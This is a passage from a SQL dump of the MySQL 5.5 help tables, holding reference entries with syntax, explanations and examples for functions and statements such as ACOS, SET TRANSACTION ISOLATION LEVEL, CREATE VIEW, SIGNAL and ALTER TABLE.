\'10.0.5.9\'\n','http://dev.mysql.com/doc/refman/5.5/en/miscellaneous-functions.html'),(449,'ACOS',3,'Syntax:\nACOS(X)\n\nReturns the arc cosine of X, that is, the value whose cosine is X.\nReturns NULL if X is not in the range -1 to 1.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html\n\n','mysql> SELECT ACOS(1);\n -> 0\nmysql> SELECT ACOS(1.0001);\n -> NULL\nmysql> SELECT ACOS(0);\n -> 1.5707963267949\n','http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html'),(450,'ISOLATION',8,'Syntax:\nSET [GLOBAL | SESSION] TRANSACTION ISOLATION LEVEL\n {\n REPEATABLE READ\n | READ COMMITTED\n | READ UNCOMMITTED\n | SERIALIZABLE\n }\n\nThis statement sets the transaction isolation level, used for\noperations on InnoDB tables.\n\nScope of the Isolation Level\n\nYou can set the isolation level globally, for the current session, or\nfor the next transaction:\n\no With the GLOBAL keyword, the statement sets the default transaction\n level globally for all subsequent sessions. Existing sessions are\n unaffected.\n\no With the SESSION keyword, the statement sets the default transaction\n level for all subsequent transactions performed within the current\n session.\n\no Without any SESSION or GLOBAL keyword, the statement sets the\n isolation level for the next (not started) transaction performed\n within the current session. Subsequent transactions revert to using\n the SESSION isolation level.\n\nA change to the global default isolation level requires the SUPER\nprivilege. Any session is free to change its session isolation level\n(even in the middle of a transaction), or the isolation level for its\nnext transaction.\n\nSET TRANSACTION ISOLATION LEVEL without GLOBAL or SESSION is not\npermitted while there is an active transaction:\n\nmysql> START TRANSACTION;\nQuery OK, 0 rows affected (0.02 sec)\n\nmysql> SET TRANSACTION ISOLATION LEVEL SERIALIZABLE;\nERROR 1568 (25001): Transaction isolation level can\'t be changed\nwhile a transaction is in progress\n\nTo set the global default isolation level at server startup, use the\n--transaction-isolation=level option to mysqld on the command line or\nin an option file. Values of level for this option use dashes rather\nthan spaces, so the permissible values are READ-UNCOMMITTED,\nREAD-COMMITTED, REPEATABLE-READ, or SERIALIZABLE. For example, to set\nthe default isolation level to REPEATABLE READ, use these lines in the\n[mysqld] section of an option file:\n\n[mysqld]\ntransaction-isolation = REPEATABLE-READ\n\nIt is possible to check or set the global and session transaction\nisolation levels at runtime by using the tx_isolation system variable:\n\nSELECT @@GLOBAL.tx_isolation, @@tx_isolation;\nSET GLOBAL tx_isolation=\'REPEATABLE-READ\';\nSET SESSION tx_isolation=\'SERIALIZABLE\';\n\nDetails and Usage of Isolation Levels\n\nInnoDB supports each of the transaction isolation levels described here\nusing different locking strategies. You can enforce a high degree of\nconsistency with the default REPEATABLE READ level, for operations on\ncrucial data where ACID compliance is important. Or you can relax the\nconsistency rules with READ COMMITTED or even READ UNCOMMITTED, in\nsituations such as bulk reporting where precise consistency and\nrepeatable results are less important than minimizing the amount of\noverhead for locking. SERIALIZABLE enforces even stricter rules than\nREPEATABLE READ, and is used mainly in specialized situations, such as\nwith XA transactions and for troubleshooting issues with concurrency\nand deadlocks.\n\nFor full information about how these isolation levels work with InnoDB\ntransactions, see\nhttp://dev.mysql.com/doc/refman/5.5/en/innodb-transaction-model.html.\nIn particular, for additional information about InnoDB record-level\nlocks and how it uses them to execute various types of statements, see\nhttp://dev.mysql.com/doc/refman/5.5/en/innodb-record-level-locks.html\nand http://dev.mysql.com/doc/refman/5.5/en/innodb-locks-set.html.\n\nThe following list describes how MySQL supports the different\ntransaction levels. The list goes from the most commonly used level to\nthe least used.\n\no REPEATABLE READ\n\n This is the default isolation level for InnoDB. For consistent reads,\n there is an important difference from the READ COMMITTED isolation\n level: All consistent reads within the same transaction read the\n snapshot established by the first read. This convention means that if\n you issue several plain (nonlocking) SELECT statements within the\n same transaction, these SELECT statements are consistent also with\n respect to each other. See\n http://dev.mysql.com/doc/refman/5.5/en/innodb-consistent-read.html.\n\n For locking reads (SELECT with FOR UPDATE or LOCK IN SHARE MODE),\n UPDATE, and DELETE statements, locking depends on whether the\n statement uses a unique index with a unique search condition, or a\n range-type search condition. For a unique index with a unique search\n condition, InnoDB locks only the index record found, not the gap\n before it. For other search conditions, InnoDB locks the index range\n scanned, using gap locks or next-key (gap plus index-record) locks to\n block insertions by other sessions into the gaps covered by the\n range.\n\no READ COMMITTED\n\n A somewhat Oracle-like isolation level with respect to consistent\n (nonlocking) reads: Each consistent read, even within the same\n transaction, sets and reads its own fresh snapshot. See\n http://dev.mysql.com/doc/refman/5.5/en/innodb-consistent-read.html.\n\n For locking reads (SELECT with FOR UPDATE or LOCK IN SHARE MODE),\n UPDATE statements, and DELETE statements, InnoDB locks only index\n records, not the gaps before them, and thus permits the free\n insertion of new records next to locked records.\n\n *Note*: In MySQL 5.5, when READ COMMITTED isolation level is used or\n the innodb_locks_unsafe_for_binlog system variable is enabled, there\n is no InnoDB gap locking except for foreign-key constraint checking\n and duplicate-key checking. Also, record locks for nonmatching rows\n are released after MySQL has evaluated the WHERE condition. If you\n use READ COMMITTED or enable innodb_locks_unsafe_for_binlog, you must\n use row-based binary logging.\n\no READ UNCOMMITTED\n\n SELECT statements are performed in a nonlocking fashion, but a\n possible earlier version of a row might be used. Thus, using this\n isolation level, such reads are not consistent. This is also called a\n \"dirty read.\" Otherwise, this isolation level works like READ\n COMMITTED.\n\no SERIALIZABLE\n\n This level is like REPEATABLE READ, but InnoDB implicitly converts\n all plain SELECT statements to SELECT ... LOCK IN SHARE MODE if\n autocommit is disabled. If autocommit is enabled, the SELECT is its\n own transaction. It therefore is known to be read only and can be\n serialized if performed as a consistent (nonlocking) read and need\n not block for other transactions. (To force a plain SELECT to block\n if other transactions have modified the selected rows, disable\n autocommit.)\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/set-transaction.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/set-transaction.html'),(451,'CEILING',3,'Syntax:\nCEILING(X)\n\nReturns the smallest integer value not less than X.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html\n\n','mysql> SELECT CEILING(1.23);\n -> 2\nmysql> SELECT CEILING(-1.23);\n -> -1\n','http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html'),(452,'SIN',3,'Syntax:\nSIN(X)\n\nReturns the sine of X, where X is given in radians.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html\n\n','mysql> SELECT SIN(PI());\n -> 1.2246063538224e-16\nmysql> SELECT ROUND(SIN(PI()));\n -> 0\n','http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html'),(453,'DAYOFWEEK',32,'Syntax:\nDAYOFWEEK(date)\n\nReturns the weekday index for date (1 = Sunday, 2 = Monday, ..., 7 =\nSaturday). These index values correspond to the ODBC standard.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT DAYOFWEEK(\'2007-02-03\');\n -> 7\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(454,'SHOW PROCESSLIST',27,'Syntax:\nSHOW [FULL] PROCESSLIST\n\nSHOW PROCESSLIST shows you which threads are running. You can also get\nthis information from the INFORMATION_SCHEMA PROCESSLIST table or the\nmysqladmin processlist command. If you have the PROCESS privilege, you\ncan see all threads. Otherwise, you can see only your own threads (that\nis, threads associated with the MySQL account that you are using). If\nyou do not use the FULL keyword, only the first 100 characters of each\nstatement are shown in the Info field.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-processlist.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/show-processlist.html'),(455,'LINEFROMWKB',33,'LineFromWKB(wkb[,srid]), LineStringFromWKB(wkb[,srid])\n\nConstructs a LineString value using its WKB representation and SRID.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-wkb-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/gis-wkb-functions.html'),(456,'GEOMETRYTYPE',37,'GeometryType(g)\n\nReturns a binary string indicating the name of the geometry type of\nwhich the geometry instance g is a member. The name corresponds to one\nof the instantiable Geometry subclasses.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-general-property-functions.html\n\n','mysql> SELECT GeometryType(GeomFromText(\'POINT(1 1)\'));\n+------------------------------------------+\n| GeometryType(GeomFromText(\'POINT(1 1)\')) |\n+------------------------------------------+\n| POINT |\n+------------------------------------------+\n','http://dev.mysql.com/doc/refman/5.5/en/gis-general-property-functions.html'),(457,'CREATE VIEW',40,'Syntax:\nCREATE\n [OR REPLACE]\n [ALGORITHM = {UNDEFINED | MERGE | TEMPTABLE}]\n [DEFINER = { user | CURRENT_USER }]\n [SQL SECURITY { DEFINER | INVOKER }]\n VIEW view_name [(column_list)]\n AS select_statement\n [WITH [CASCADED | LOCAL] CHECK OPTION]\n\nThe CREATE VIEW statement creates a new view, or replaces an existing\nview if the OR REPLACE clause is given. If the view does not exist,\nCREATE OR REPLACE VIEW is the same as CREATE VIEW. If the view does\nexist, CREATE OR REPLACE VIEW is the same as ALTER VIEW.\n\nThe select_statement is a SELECT statement that provides the definition\nof the view. (Selecting from the view selects, in effect, using the\nSELECT statement.) The select_statement can select from base tables or\nother views.\n\nThe view definition is \"frozen\" at creation time. Changes to the\nunderlying tables afterward do not affect the view definition. For\nexample, if a view is defined as SELECT * on a table, new columns added\nto the table later do not become part of the view.\n\nThe ALGORITHM clause affects how MySQL processes the view. The DEFINER\nand SQL SECURITY clauses specify the security context to be used when\nchecking access privileges at view invocation time. The WITH CHECK\nOPTION clause can be given to constrain inserts or updates to rows in\ntables referenced by the view. These clauses are described later in\nthis section.\n\nThe CREATE VIEW statement requires the CREATE VIEW privilege for the\nview, and some privilege for each column selected by the SELECT\nstatement. For columns used elsewhere in the SELECT statement, you must\nhave the SELECT privilege. If the OR REPLACE clause is present, you\nmust also have the DROP privilege for the view. CREATE VIEW might also\nrequire the SUPER privilege, depending on the DEFINER value, as\ndescribed later in this section.\n\nWhen a view is referenced, privilege checking occurs as described later\nin this section.\n\nA view belongs to a database. By default, a new view is created in the\ndefault database. To create the view explicitly in a given database,\nuse db_name.view_name syntax to qualify the view name with the database\nname:\n\nmysql> CREATE VIEW test.v AS SELECT * FROM t;\n\nWithin a database, base tables and views share the same namespace, so a\nbase table and a view cannot have the same name.\n\nColumns retrieved by the SELECT statement can be simple references to\ntable columns, or expressions that use functions, constant values,\noperators, and so forth.\n\nA view must have unique column names with no duplicates, just like a\nbase table. By default, the names of the columns retrieved by the\nSELECT statement are used for the view column names. To define explicit\nnames for the view columns, the optional column_list clause can be\ngiven as a list of comma-separated identifiers. The number of names in\ncolumn_list must be the same as the number of columns retrieved by the\nSELECT statement.\n\nUnqualified table or view names in the SELECT statement are interpreted\nwith respect to the default database. A view can refer to tables or\nviews in other databases by qualifying the table or view name with the\nappropriate database name.\n\nA view can be created from many kinds of SELECT statements. It can\nrefer to base tables or other views. It can use joins, UNION, and\nsubqueries. The SELECT need not even refer to any tables.\n\nThe following example defines a view that selects two columns from\nanother table as well as an expression calculated from those columns:\n\nmysql> CREATE TABLE t (qty INT, price INT);\nmysql> INSERT INTO t VALUES(3, 50);\nmysql> CREATE VIEW v AS SELECT qty, price, qty*price AS value FROM t;\nmysql> SELECT * FROM v;\n+------+-------+-------+\n| qty | price | value |\n+------+-------+-------+\n| 3 | 50 | 150 |\n+------+-------+-------+\n\nA view definition is subject to the following restrictions:\n\no The SELECT statement cannot contain a subquery in the FROM clause.\n\no The SELECT statement cannot refer to system variables or user-defined\n variables.\n\no Within a stored program, the SELECT statement cannot refer to program\n parameters or local variables.\n\no The SELECT statement cannot refer to prepared statement parameters.\n\no Any table or view referred to in the definition must exist. After the\n view has been created, it is possible to drop a table or view that\n the definition refers to. In this case, use of the view results in an\n error. To check a view definition for problems of this kind, use the\n CHECK TABLE statement.\n\no The definition cannot refer to a TEMPORARY table, and you cannot\n create a TEMPORARY view.\n\no You cannot associate a trigger with a view.\n\no Aliases for column names in the SELECT statement are checked against\n the maximum column length of 64 characters (not the maximum alias\n length of 256 characters).\n\nORDER BY is permitted in a view definition, but it is ignored if you\nselect from a view using a statement that has its own ORDER BY.\n\nFor other options or clauses in the definition, they are added to the\noptions or clauses of the statement that references the view, but the\neffect is undefined. For example, if a view definition includes a LIMIT\nclause, and you select from the view using a statement that has its own\nLIMIT clause, it is undefined which limit applies. This same principle\napplies to options such as ALL, DISTINCT, or SQL_SMALL_RESULT that\nfollow the SELECT keyword, and to clauses such as INTO, FOR UPDATE,\nLOCK IN SHARE MODE, and PROCEDURE.\n\nIf you create a view and then change the query processing environment\nby changing system variables, that may affect the results you get from\nthe view:\n\nmysql> CREATE VIEW v (mycol) AS SELECT \'abc\';\nQuery OK, 0 rows affected (0.01 sec)\n\nmysql> SET sql_mode = \'\';\nQuery OK, 0 rows affected (0.00 sec)\n\nmysql> SELECT \"mycol\" FROM v;\n+-------+\n| mycol |\n+-------+\n| mycol |\n+-------+\n1 row in set (0.01 sec)\n\nmysql> SET sql_mode = \'ANSI_QUOTES\';\nQuery OK, 0 rows affected (0.00 sec)\n\nmysql> SELECT \"mycol\" FROM v;\n+-------+\n| mycol |\n+-------+\n| abc |\n+-------+\n1 row in set (0.00 sec)\n\nThe DEFINER and SQL SECURITY clauses determine which MySQL account to\nuse when checking access privileges for the view when a statement is\nexecuted that references the view. The valid SQL SECURITY\ncharacteristic values are DEFINER (the default) and INVOKER. These\nindicate that the required privileges must be held by the user who\ndefined or invoked the view, respectively.\n\nIf a user value is given for the DEFINER clause, it should be a MySQL\naccount specified as \'user_name\'@\'host_name\' (the same format used in\nthe GRANT statement), CURRENT_USER, or CURRENT_USER(). The default\nDEFINER value is the user who executes the CREATE VIEW statement. This\nis the same as specifying DEFINER = CURRENT_USER explicitly.\n\nIf you specify the DEFINER clause, these rules determine the valid\nDEFINER user values:\n\no If you do not have the SUPER privilege, the only valid user value is\n your own account, either specified literally or by using\n CURRENT_USER. You cannot set the definer to some other account.\n\no If you have the SUPER privilege, you can specify any syntactically\n valid account name. If the account does not exist, a warning is\n generated.\n\no Although it is possible to create a view with a nonexistent DEFINER\n account, an error occurs when the view is referenced if the SQL\n SECURITY value is DEFINER but the definer account does not exist.\n\nFor more information about view security, see\nhttp://dev.mysql.com/doc/refman/5.5/en/stored-programs-security.html.\n\nWithin a view definition, CURRENT_USER returns the view\'s DEFINER value\nby default. For views defined with the SQL SECURITY INVOKER\ncharacteristic, CURRENT_USER returns the account for the view\'s\ninvoker. For information about user auditing within views, see\nhttp://dev.mysql.com/doc/refman/5.5/en/account-activity-auditing.html.\n\nWithin a stored routine that is defined with the SQL SECURITY DEFINER\ncharacteristic, CURRENT_USER returns the routine\'s DEFINER value. This\nalso affects a view defined within such a routine, if the view\ndefinition contains a DEFINER value of CURRENT_USER.\n\nMySQL checks view privileges like this:\n\no At view definition time, the view creator must have the privileges\n needed to use the top-level objects accessed by the view. For\n example, if the view definition refers to table columns, the creator\n must have some privilege for each column in the select list of the\n definition, and the SELECT privilege for each column used elsewhere\n in the definition. If the definition refers to a stored function,\n only the privileges needed to invoke the function can be checked. The\n privileges required at function invocation time can be checked only\n as it executes: For different invocations, different execution paths\n within the function might be taken.\n\no The user who references a view must have appropriate privileges to\n access it (SELECT to select from it, INSERT to insert into it, and so\n forth.)\n\no When a view has been referenced, privileges for objects accessed by\n the view are checked against the privileges held by the view DEFINER\n account or invoker, depending on whether the SQL SECURITY\n characteristic is DEFINER or INVOKER, respectively.\n\no If reference to a view causes execution of a stored function,\n privilege checking for statements executed within the function depend\n on whether the function SQL SECURITY characteristic is DEFINER or\n INVOKER. If the security characteristic is DEFINER, the function runs\n with the privileges of the DEFINER account. If the characteristic is\n INVOKER, the function runs with the privileges determined by the\n view\'s SQL SECURITY characteristic.\n\nExample: A view might depend on a stored function, and that function\nmight invoke other stored routines. For example, the following view\ninvokes a stored function f():\n\nCREATE VIEW v AS SELECT * FROM t WHERE t.id = f(t.name);\n\nSuppose that f() contains a statement such as this:\n\nIF name IS NULL then\n CALL p1();\nELSE\n CALL p2();\nEND IF;\n\nThe privileges required for executing statements within f() need to be\nchecked when f() executes. This might mean that privileges are needed\nfor p1() or p2(), depending on the execution path within f(). Those\nprivileges must be checked at runtime, and the user who must possess\nthe privileges is determined by the SQL SECURITY values of the view v\nand the function f().\n\nThe DEFINER and SQL SECURITY clauses for views are extensions to\nstandard SQL. In standard SQL, views are handled using the rules for\nSQL SECURITY DEFINER. The standard says that the definer of the view,\nwhich is the same as the owner of the view\'s schema, gets applicable\nprivileges on the view (for example, SELECT) and may grant them. MySQL\nhas no concept of a schema \"owner\", so MySQL adds a clause to identify\nthe definer. The DEFINER clause is an extension where the intent is to\nhave what the standard has; that is, a permanent record of who defined\nthe view. This is why the default DEFINER value is the account of the\nview creator.\n\nThe optional ALGORITHM clause is a MySQL extension to standard SQL. It\naffects how MySQL processes the view. ALGORITHM takes three values:\nMERGE, TEMPTABLE, or UNDEFINED. The default algorithm is UNDEFINED if\nno ALGORITHM clause is present. For more information, see\nhttp://dev.mysql.com/doc/refman/5.5/en/view-algorithms.html.\n\nSome views are updatable. That is, you can use them in statements such\nas UPDATE, DELETE, or INSERT to update the contents of the underlying\ntable. For a view to be updatable, there must be a one-to-one\nrelationship between the rows in the view and the rows in the\nunderlying table. There are also certain other constructs that make a\nview nonupdatable.\n\nThe WITH CHECK OPTION clause can be given for an updatable view to\nprevent inserts or updates to rows except those for which the WHERE\nclause in the select_statement is true.\n\nIn a WITH CHECK OPTION clause for an updatable view, the LOCAL and\nCASCADED keywords determine the scope of check testing when the view is\ndefined in terms of another view. The LOCAL keyword restricts the CHECK\nOPTION only to the view being defined. CASCADED causes the checks for\nunderlying views to be evaluated as well. When neither keyword is\ngiven, the default is CASCADED.\n\nFor more information about updatable views and the WITH CHECK OPTION\nclause, see\nhttp://dev.mysql.com/doc/refman/5.5/en/view-updatability.html, and\nhttp://dev.mysql.com/doc/refman/5.5/en/view-check-option.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/create-view.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/create-view.html'),(458,'TRIM',38,'Syntax:\nTRIM([{BOTH | LEADING | TRAILING} [remstr] FROM] str), TRIM([remstr\nFROM] str)\n\nReturns the string str with all remstr prefixes or suffixes removed. If\nnone of the specifiers BOTH, LEADING, or TRAILING is given, BOTH is\nassumed. remstr is optional and, if not specified, spaces are removed.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','mysql> SELECT TRIM(\' bar \');\n -> \'bar\'\nmysql> SELECT TRIM(LEADING \'x\' FROM \'xxxbarxxx\');\n -> \'barxxx\'\nmysql> SELECT TRIM(BOTH \'x\' FROM \'xxxbarxxx\');\n -> \'bar\'\nmysql> SELECT TRIM(TRAILING \'xyz\' FROM \'barxxyz\');\n -> \'barx\'\n','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(459,'IS',20,'Syntax:\nIS boolean_value\n\nTests a value against a boolean value, where boolean_value can be TRUE,\nFALSE, or UNKNOWN.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html\n\n','mysql> SELECT 1 IS TRUE, 0 IS FALSE, NULL IS UNKNOWN;\n -> 1, 1, 1\n','http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html'),(460,'GET_FORMAT',32,'Syntax:\nGET_FORMAT({DATE|TIME|DATETIME}, {\'EUR\'|\'USA\'|\'JIS\'|\'ISO\'|\'INTERNAL\'})\n\nReturns a format string. This function is useful in combination with\nthe DATE_FORMAT() and the STR_TO_DATE() functions.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT DATE_FORMAT(\'2003-10-03\',GET_FORMAT(DATE,\'EUR\'));\n -> \'03.10.2003\'\nmysql> SELECT STR_TO_DATE(\'10.31.2003\',GET_FORMAT(DATE,\'USA\'));\n -> \'2003-10-31\'\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(461,'TINYBLOB',23,'TINYBLOB\n\nA BLOB column with a maximum length of 255 (28 − 1) bytes. Each\nTINYBLOB value is stored using a 1-byte length prefix that indicates\nthe number of bytes in the value.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-type-overview.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/string-type-overview.html'),(462,'SIGNAL',24,'Syntax:\nSIGNAL condition_value\n [SET signal_information_item\n [, signal_information_item] ...]\n\ncondition_value:\n SQLSTATE [VALUE] sqlstate_value\n | condition_name\n\nsignal_information_item:\n condition_information_item_name = simple_value_specification\n\ncondition_information_item_name:\n CLASS_ORIGIN\n | SUBCLASS_ORIGIN\n | MESSAGE_TEXT\n | MYSQL_ERRNO\n | CONSTRAINT_CATALOG\n | CONSTRAINT_SCHEMA\n | CONSTRAINT_NAME\n | CATALOG_NAME\n | SCHEMA_NAME\n | TABLE_NAME\n | COLUMN_NAME\n | CURSOR_NAME\n\ncondition_name, simple_value_specification:\n (see following discussion)\n\nSIGNAL is the way to \"return\" an error. SIGNAL provides error\ninformation to a handler, to an outer portion of the application, or to\nthe client. Also, it provides control over the error\'s characteristics\n(error number, SQLSTATE value, message). Without SIGNAL, it is\nnecessary to resort to workarounds such as deliberately referring to a\nnonexistent table to cause a routine to return an error.\n\nNo special privileges are required to execute the SIGNAL statement.\n\nThe condition_value in a SIGNAL statement indicates the error value to\nbe returned. It can be an SQLSTATE value (a 5-character string literal)\nor a condition_name that refers to a named condition previously defined\nwith DECLARE ... CONDITION (see [HELP DECLARE CONDITION]).\n\nAn SQLSTATE value can indicate errors, warnings, or \"not found.\" The\nfirst two characters of the value indicate its error class, as\ndiscussed in\nhttp://dev.mysql.com/doc/refman/5.5/en/signal.html#signal-condition-inf\normation-items. Some signal values cause statement termination; see\nhttp://dev.mysql.com/doc/refman/5.5/en/signal.html#signal-effects.\n\nThe SQLSTATE value for a SIGNAL statement should not start with \'00\'\nbecause such values indicate success and are not valid for signaling an\nerror. This is true whether the SQLSTATE value is specified directly in\nthe SIGNAL statement or in a named condition referred to in the\nstatement. If the value is invalid, a Bad SQLSTATE error occurs.\n\nTo signal a generic SQLSTATE value, use \'45000\', which means \"unhandled\nuser-defined exception.\"\n\nThe SIGNAL statement optionally includes a SET clause that contains\nmultiple signal items, in a comma-separated list of\ncondition_information_item_name = simple_value_specification\nassignments.\n\nEach condition_information_item_name may be specified only once in the\nSET clause. Otherwise, a Duplicate condition information item error\noccurs.\n\nValid simple_value_specification designators can be specified using\nstored procedure or function parameters, stored program local variables\ndeclared with DECLARE, user-defined variables, system variables, or\nliterals. A character literal may include a _charset introducer.\n\nFor information about permissible condition_information_item_name\nvalues, see\nhttp://dev.mysql.com/doc/refman/5.5/en/signal.html#signal-condition-inf\normation-items.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/signal.html\n\n','CREATE PROCEDURE p (pval INT)\nBEGIN\n DECLARE specialty CONDITION FOR SQLSTATE \'45000\';\n IF pval = 0 THEN\n SIGNAL SQLSTATE \'01000\';\n ELSEIF pval = 1 THEN\n SIGNAL SQLSTATE \'45000\'\n SET MESSAGE_TEXT = \'An error occurred\';\n ELSEIF pval = 2 THEN\n SIGNAL specialty\n SET MESSAGE_TEXT = \'An error occurred\';\n ELSE\n SIGNAL SQLSTATE \'01000\'\n SET MESSAGE_TEXT = \'A warning occurred\', MYSQL_ERRNO = 1000;\n SIGNAL SQLSTATE \'45000\'\n SET MESSAGE_TEXT = \'An error occurred\', MYSQL_ERRNO = 1001;\n END IF;\nEND;\n','http://dev.mysql.com/doc/refman/5.5/en/signal.html'),(463,'SAVEPOINT',8,'Syntax:\nSAVEPOINT identifier\nROLLBACK [WORK] TO [SAVEPOINT] identifier\nRELEASE SAVEPOINT identifier\n\nInnoDB supports the SQL statements SAVEPOINT, ROLLBACK TO SAVEPOINT,\nRELEASE SAVEPOINT and the optional WORK keyword for ROLLBACK.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/savepoint.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/savepoint.html'),(464,'USER',17,'Syntax:\nUSER()\n\nReturns the current MySQL user name and host name as a string in the\nutf8 character set.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/information-functions.html\n\n','mysql> SELECT USER();\n -> \'davida@localhost\'\n','http://dev.mysql.com/doc/refman/5.5/en/information-functions.html'),(465,'LABELS',24,'Syntax:\n[begin_label:] BEGIN\n [statement_list]\nEND [end_label]\n\n[begin_label:] LOOP\n statement_list\nEND LOOP [end_label]\n\n[begin_label:] REPEAT\n statement_list\nUNTIL search_condition\nEND REPEAT [end_label]\n\n[begin_label:] WHILE search_condition DO\n statement_list\nEND WHILE [end_label]\n\nLabels are permitted for BEGIN ... END blocks and for the LOOP, REPEAT,\nand WHILE statements. Label use for those statements follows these\nrules:\n\no begin_label must be followed by a colon.\n\no begin_label can be given without end_label. If end_label is present,\n it must be the same as begin_label.\n\no end_label cannot be given without begin_label.\n\no Labels at the same nesting level must be distinct.\n\no Labels can be up to 16 characters long.\n\nTo refer to a label within the labeled construct, use an ITERATE or\nLEAVE statement. The following example uses those statements to\ncontinue iterating or terminate the loop:\n\nCREATE PROCEDURE doiterate(p1 INT)\nBEGIN\n label1: LOOP\n SET p1 = p1 + 1;\n IF p1 < 10 THEN ITERATE label1; END IF;\n LEAVE label1;\n END LOOP label1;\nEND;\n\nThe scope of a block label does not include the code for handlers\ndeclared within the block. For details, see [HELP DECLARE HANDLER].\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/statement-labels.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/statement-labels.html'),(466,'ALTER TABLE',40,'Syntax:\nALTER [ONLINE | OFFLINE] [IGNORE] TABLE tbl_name\n [alter_specification [, alter_specification] ...]\n [partition_options]\n\nalter_specification:\n table_options\n | ADD [COLUMN] col_name column_definition\n [FIRST | AFTER col_name ]\n | ADD [COLUMN] (col_name column_definition,...)\n | ADD {INDEX|KEY} [index_name]\n [index_type] (index_col_name,...) [index_option] ...\n | ADD [CONSTRAINT [symbol]] PRIMARY KEY\n [index_type] (index_col_name,...) [index_option] ...\n | ADD [CONSTRAINT [symbol]]\n UNIQUE [INDEX|KEY] [index_name]\n [index_type] (index_col_name,...) [index_option] ...\n | ADD FULLTEXT [INDEX|KEY] [index_name]\n (index_col_name,...) [index_option] ...\n | ADD SPATIAL [INDEX|KEY] [index_name]\n (index_col_name,...) [index_option] ...\n | ADD [CONSTRAINT [symbol]]\n FOREIGN KEY [index_name] (index_col_name,...)\n reference_definition\n | ALTER [COLUMN] col_name {SET DEFAULT literal | DROP DEFAULT}\n | CHANGE [COLUMN] old_col_name new_col_name column_definition\n [FIRST|AFTER col_name]\n | MODIFY [COLUMN] col_name column_definition\n [FIRST | AFTER col_name]\n | DROP [COLUMN] col_name\n | DROP PRIMARY KEY\n | DROP {INDEX|KEY} index_name\n | DROP FOREIGN KEY fk_symbol\n | DISABLE KEYS\n | ENABLE KEYS\n | RENAME [TO|AS] new_tbl_name\n | ORDER BY col_name [, col_name] ...\n | CONVERT TO CHARACTER SET charset_name [COLLATE collation_name]\n | [DEFAULT] CHARACTER SET [=] charset_name [COLLATE [=] collation_name]\n | DISCARD TABLESPACE\n | IMPORT TABLESPACE\n | FORCE\n | ADD PARTITION (partition_definition)\n | DROP PARTITION partition_names\n | TRUNCATE PARTITION {partition_names | ALL}\n | COALESCE PARTITION number\n | REORGANIZE PARTITION [partition_names INTO (partition_definitions)]\n | ANALYZE PARTITION {partition_names | ALL}\n | CHECK PARTITION {partition_names | ALL}\n | OPTIMIZE PARTITION {partition_names | ALL}\n | REBUILD PARTITION {partition_names | ALL}\n | REPAIR PARTITION {partition_names | ALL}\n | PARTITION BY partitioning_expression\n | REMOVE PARTITIONING\n\nindex_col_name:\n col_name [(length)] [ASC | DESC]\n\nindex_type:\n USING {BTREE | HASH}\n\nindex_option:\n KEY_BLOCK_SIZE [=] value\n | index_type\n | WITH PARSER parser_name\n | COMMENT \'string\'\n\ntable_options:\n table_option [[,] table_option] ... (see CREATE TABLE options)\n\npartition_options:\n (see CREATE TABLE options)\n\nALTER TABLE changes the structure of a table. For example, you can add\nor delete columns, create or destroy indexes, change the type of\nexisting columns, or rename columns or the table itself. You can also\nchange characteristics such as the storage engine used for the table or\nthe table comment.\n\nFollowing the table name, specify the alterations to be made. If none\nare given, ALTER TABLE does nothing.\n\nThe syntax for many of the permissible alterations is similar to\nclauses of the CREATE TABLE statement. See [HELP CREATE TABLE], for\nmore information.\n\ntable_options signifies table options of the kind that can be used in\nthe CREATE TABLE statement, such as ENGINE, AUTO_INCREMENT,\nAVG_ROW_LENGTH, MAX_ROWS, or ROW_FORMAT. For a list of all table\noptions and a description of each, see [HELP CREATE TABLE]. However,\nALTER TABLE ignores the DATA DIRECTORY and INDEX DIRECTORY table\noptions.\n\npartition_options signifies options that can be used with partitioned\ntables for repartitioning, for adding, dropping, merging, and splitting\npartitions, and for performing partitioning maintenance. It is possible\nfor an ALTER TABLE statement to contain a PARTITION BY or REMOVE\nPARTITIONING clause in an addition to other alter specifications, but\nthe PARTITION BY or REMOVE PARTITIONING clause must be specified last\nafter any other specifications. The ADD PARTITION, DROP PARTITION,\nCOALESCE PARTITION, REORGANIZE PARTITION, ANALYZE PARTITION, CHECK\nPARTITION, and REPAIR PARTITION options cannot be combined with other\nalter specifications in a single ALTER TABLE, since the options just\nlisted act on individual partitions. For a list of partition options\nand a description of each, see [HELP CREATE TABLE]. For additional\ninformation, see\nhttp://dev.mysql.com/doc/refman/5.5/en/alter-table-partition-operations\n.html.\n\nSome operations may result in warnings if attempted on a table for\nwhich the storage engine does not support the operation. These warnings\ncan be displayed with SHOW WARNINGS. See [HELP SHOW WARNINGS].\n\nFor information on troubleshooting ALTER TABLE, 